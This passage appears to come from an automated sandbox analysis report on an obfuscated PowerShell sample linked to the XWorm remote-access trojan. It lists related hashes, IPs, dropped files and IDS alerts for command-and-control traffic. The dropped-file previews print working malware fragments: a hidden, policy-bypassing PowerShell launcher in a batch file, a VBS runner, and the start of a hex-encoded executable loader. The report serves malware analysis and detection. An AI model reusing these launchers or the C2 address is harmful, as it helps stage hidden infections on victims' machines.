                                                    • 188.114.97.3
                                                    payload_1.vbsGet hashmaliciousXWormBrowse
                                                    • 104.26.12.205
                                                    PurchaseXOrderXPO16145.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    https://www.dropbox.com/l/scl/AADyLw2rXknip-xl340QrjVvZFuSmG6MEbEGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    4zyQ690hFT.ps1Get hashmaliciousXWormBrowse
                                                    • 172.67.74.152
                                                    NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                                                    • 104.26.12.205
                                                    PurchaseXOrderXPO16145.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    ASN-XTUDIONETES84Z63SyEQ7.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 191.96.207.180
                                                    XClient.exeGet hashmaliciousXWormBrowse
                                                    • 191.96.207.180
                                                    GvJxEfWyS1.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 191.96.207.180
                                                    7lFbTUxX9m.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 191.96.207.180
                                                    XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                                    • 191.96.207.180
                                                    lzsVg6vGuu.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 191.96.207.180
                                                    payload_1.vbsGet hashmaliciousXWormBrowse
                                                    • 191.96.207.180
                                                    Commitment_for_Title_Insurance-660184790411.wsfGet hashmaliciousXWormBrowse
                                                    • 191.96.207.180
                                                    file_5822aee2333945a68f99cf2cfdd0e024_2024-09-16_14_28_33_034000.zipGet hashmaliciousUnknownBrowse
                                                    • 179.61.228.98
                                                    mlnZfOifRX.elfGet hashmaliciousOkiruBrowse
                                                    • 45.151.195.118

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0ecFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    payload_1.vbsGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    4zyQ690hFT.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    ksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    https://tiktok4.top/www/Get hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205
                                                    eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    • 104.26.12.205

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Music\Visuals\VsEnhance.bat

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):145
                                                    Entropy (8bit):4.223744773916197
                                                    Encrypted:false
                                                    SSDEEP:3:mKDDNF/CuSNAJJFILuTNAy+CFdZkRE3WH5zXQEJXHnBFXX:hB01s86WCF8X5TQEtHnzH
                                                    MD5:0876C0866FF104E1CEA58C3A8CE7C00C
                                                    SHA1:F5DB743E203B5AD23A46E0FA58A3E58B8DFEEAD7
                                                    SHA-256:434D5F5A3A796E0C6644C39C4C3F5CAE78F66E0A830C24C5D401288A0E92109A
                                                    SHA-512:FF28B707E77E9849A6D9A9C1BDBF95AA0A773C3D00F3E9353C21CD6589F56649EED88AE59134F57CA40922743FE5B2DBF5B8B5AD3BCF93B13E35545C80B618D3
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:@echo off ..cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"

                                                    C:\ProgramData\Music\Visuals\VsLabs.vbs

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):178
                                                    Entropy (8bit):4.932254496693703
                                                    Encrypted:false
                                                    SSDEEP:3:9cNAWdgUdrpNvJA+eXjAJ3Em8nhdFEH8XZkRE3WH5zXQEJXyukfFjLAU2QIvm:9cNAWdgU1p9JReXjo3NqhdFu8GX5TQEy
                                                    MD5:6B1D3687FE689EC1D149478BC8BB9DF9
                                                    SHA1:CE533BB5C0C01A23183F25C43DD7CAFEE32D4DFB
                                                    SHA-256:1DE54FE06E01EC6482104F63AE17C89CEC7866C51012FC5557230CCE01270A7E
                                                    SHA-512:105E0D91E855EBB2B7BCE18B3B207F49FA9EAE2B1687BA4E41DB8E872F0CC422744CB0145E834D8E596130A167A3BD399C70576D6D205F699636E0A6FCC44A7B
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:On Error Resume Next....Sub zjte.. Dim sbyjn.. Set sbyjn = CreateObject("WScript.Shell").. sbyjn.Run "C:\ProgramData\Music\Visuals\VsEnhance.bat", 0, True..End Sub..zjte

                                                    C:\ProgramData\Music\Visuals\VsLabsData.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with very long lines (65526), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):329783
                                                    Entropy (8bit):3.1248255692674873
                                                    Encrypted:false
                                                    SSDEEP:3072:wL3D5WXtWVH44LhC8z60U4h3mShvTUfWwLC5ImBK5W9Fp81fABAUvetcTnZm:Q5W0H44LhC85TUOwqYyfbg
                                                    MD5:7CEE317B8911C2BF3F013B44CAAC9E4E
                                                    SHA1:91DAC8BCDC075A226D21292563C5DB084B826F80
                                                    SHA-256:41F746CFBFC418CAEE659826B7FC4728E1347014EA5F0C840728B30BA31B3C8B
                                                    SHA-512:42FE836BF246AF4BCC2259DDE43CFD29612CD6E320E87BD714C31D61FAF8F9322EFFBE99BB76E55DD92044DE6FAB8D6A8CB3D5122277B4F981A8534BFE92A601
                                                    Malicious:true
                                                    Preview:try..{....$cake = "4D_5A_90_00_03_00_00_00_04_00_00_00_FF_FF_00_00_B8_00_00_00_00_00_00_00_40_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_80_00_00_00_0E_1F_BA_0E_00_B4_09_CD_21_B8_01_4C_CD_21_54_68_69_73_20_70_72_6F_67_72_61_6D_20_63_61_6E_6E_6F_74_20_62_65_20_72_75_6E_20_69_6E_20_44_4F_53_20_6D_6F_64_65_2E_0D_0D_0A_24_00_00_00_00_00_00_00_50_45_00_00_4C_01_03_00_7A_CF_CB_66_00_00_00_00_00_00_00_00_E0_00_02_01_0B_01_0B_00_00_78_00_00_00_08_00_00_00_00_00_00_9E_97_00_00_00_20_00_00_00_A0_00_00_00_00_40_00_00_20_00_00_00_02_00_00_04_00_00_00_00_00_00_00_04_00_00_00_00_00_00_00_00_E0_00_00_00_02_00_00_00_00_00_00_02_00_40_85_00_00_10_00_00_10_00_00_00_00_10_00_00_10_00_00_00_00_00_00_10_00_00_00_00_00_00_00_00_00_00_00_44_97_00_00_57_00_00_00_00_A0_00_00_D8_04_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_C0_00_00_0C_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_00_

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1510207563435464
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul2/lh:NllUml
                                                    MD5:91EBFA4DA67BFAFFBEDF4CDF8D979A56
                                                    SHA1:0A84D1A045CC34CF72424BE6D5738D6C4E9C0F0B
                                                    SHA-256:4FAE73F1696D2E632530D27F2E37C59EADB53D5C2BE2FEA1BA08F1412FB00481
                                                    SHA-512:992BFEFCCC0E384A93AEF4A36F8E947340473E8920565F3D385E5A3E3CF1172A402E7E0619236BD492F6EF1E472C236235C5C909C08FEA7C9CFA6E5CF4EBF5BF
                                                    Malicious:false
                                                    Preview:@...e...............................g................@..........

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xo4tdqk.qnb.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmc2bprs.35j.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpkvfbep.1wb.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o20obl4h.esc.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ortsuiw1.iv2.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1e5mawz.hl0.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.721499098159273
                                                    Encrypted:false
                                                    SSDEEP:96:S9XCTP8qkvhkvCCtqRiRWqLHPRiRWqTHPv:S9sPdqR0NR0Vv
                                                    MD5:3B97E14E8FC9F9BEAAF22EBDFA446D08
                                                    SHA1:700CA6FC8EB5144ABA5D249C95ADD07EACEA0436
                                                    SHA-256:FD962D5F238E497ED2DF434DEA2DE628420D3129C56FFEE89EB8DE39CD7839CE
                                                    SHA-512:15CC916DD51ADC902D5FA3DBBA6BB73DB650A86942718EFBECFFFE961D39F706708FB6CB4D78E86CF840F6096FDCF589EFBB8108A6CD4FFFFBF7F2B0ABE7CB70
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ......Yd..........z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...M.m................t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B8Y............................d...A.p.p.D.a.t.a...B.V.1.....8Y....Roaming.@......EW)B8Y................................R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B8Y.............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B8Y.............................t..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B8Y......................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B8Y......................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B8Y.......0..........

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K8MQGTRYSWYCX9SYLRDS.temp

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.721499098159273
                                                    Encrypted:false
                                                    SSDEEP:96:S9XCTP8qkvhkvCCtqRiRWqLHPRiRWqTHPv:S9sPdqR0NR0Vv
                                                    MD5:3B97E14E8FC9F9BEAAF22EBDFA446D08
                                                    SHA1:700CA6FC8EB5144ABA5D249C95ADD07EACEA0436
                                                    SHA-256:FD962D5F238E497ED2DF434DEA2DE628420D3129C56FFEE89EB8DE39CD7839CE
                                                    SHA-512:15CC916DD51ADC902D5FA3DBBA6BB73DB650A86942718EFBECFFFE961D39F706708FB6CB4D78E86CF840F6096FDCF589EFBB8108A6CD4FFFFBF7F2B0ABE7CB70
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ......Yd..........z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...M.m................t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B8Y............................d...A.p.p.D.a.t.a...B.V.1.....8Y....Roaming.@......EW)B8Y................................R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B8Y.............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B8Y.............................t..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B8Y......................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B8Y......................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B8Y.......0..........

                                                    Static File Info

                                                    General

                                                    File type:ASCII text, with very long lines (63774), with CRLF line terminators
                                                    Entropy (8bit):3.2248041415162403
                                                    TrID:
                                                      File name:LUYYSwStKN.ps1
                                                      File size:334'221 bytes
                                                      MD5:7e553f6792b09e28363c15010aab9c06
                                                      SHA1:84fb99b35b92f9bf8f1468db6be571ad4c7164bd
                                                      SHA256:046ef795e6a9e68203ad07963b6a828d5aff2f55ec57bb8c0ebd778ae594d1c4
                                                      SHA512:2dc26927f35e37ab140d5e9196b783dc189abcac28fae030bc71ecd9b802ffe70580145331ad7f65c798c301dc1eb5cfd2e641405934ee132b9840bc63da0b5c
                                                      SSDEEP:3072:gL3D5WXtWVH44LhC8z60U4h3mShvTUfWwLC5ImBK5W9Fp81fABAUvetcTnZ3:A5W0H44LhC85TUOwqYyfbR
                                                      TLSH:B064C0858537FB85CC0228A61D2B39F078C86D5EA1F5C8F0AF3B9C1A26D50585FBDDA1
                                                      File Content Preview:sET-iTem vaRiaBlE:a6p ( [type]("{2}{1}{0}" -f 'E','.Fil','IO') ); ${D} = ((("{2}{5}{4}{3}{0}{6}{1}" -f 'Datap','ualsp8P','C','ram','g',':p8PPro','8PMusicp8PVis'))-rEplAcE([CHar]112+[CHar]56+[CHar]80),[CHar]92)..

                                                      File Icon

                                                      Icon Hash:3270d6baae77db44

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-09-24T19:25:13.616506+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:25:13.791487+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:25:13.918341+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:25:24.748235+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:25:24.749845+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:25:32.877958+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:25:32.877958+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:25:35.698559+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:25:35.700131+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:25:46.648279+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:25:46.650252+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:25:57.608120+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:25:57.610207+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:02.903691+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:02.903691+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:08.555372+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:08.556783+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:12.931936+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:12.934483+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:16.023117+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:16.024588+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:16.340092+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:16.341786+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:16.652649+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:16.656862+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:17.382669+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:17.384378+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:21.725945+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:21.728007+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:21.820231+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:21.821903+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:21.914188+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:21.915468+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:25.507814+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:25.514615+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:27.195134+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:27.196748+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:32.647413+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:33.059013+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:33.063429+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:33.104163+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:33.104163+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:33.123572+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:33.123572+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:37.851584+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:37.853316+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:42.946290+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:42.951206+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:48.233757+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:48.235684+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:48.381584+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:48.387411+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:53.774369+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:53.780934+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:53.873439+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
                                                      2024-09-24T19:26:53.875508+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849709191.96.207.18050000TCP
                                                      2024-09-24T19:26:53.967825+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1191.96.207.18050000192.168.2.849709TCP
